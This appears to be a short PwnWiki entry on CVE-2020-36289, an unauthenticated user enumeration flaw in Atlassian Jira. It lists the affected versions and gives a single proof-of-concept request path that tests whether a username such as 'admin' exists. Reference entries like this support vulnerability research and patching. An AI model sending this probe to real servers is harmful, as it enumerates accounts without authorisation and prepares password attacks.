CVE-2020-36289 Atlassian Jira Unauth user enumeration vulnerability

From PwnWiki
Revision as of 20:24, 11 June 2021 by Pwnwiki (talk | contribs) (Created page with "==Screenshot==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎English • ‎español • ‎עברית • ‎中文(中国大陆)‎

Affected Versions

Jira < 8.5.13
8.6.0 ≤ Jira < 8.13.5
8.14.0 ≤ Jira < 8.15.1

POC

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin

Screenshot

Twitter E3k2 J4VIAAWR 6.jpg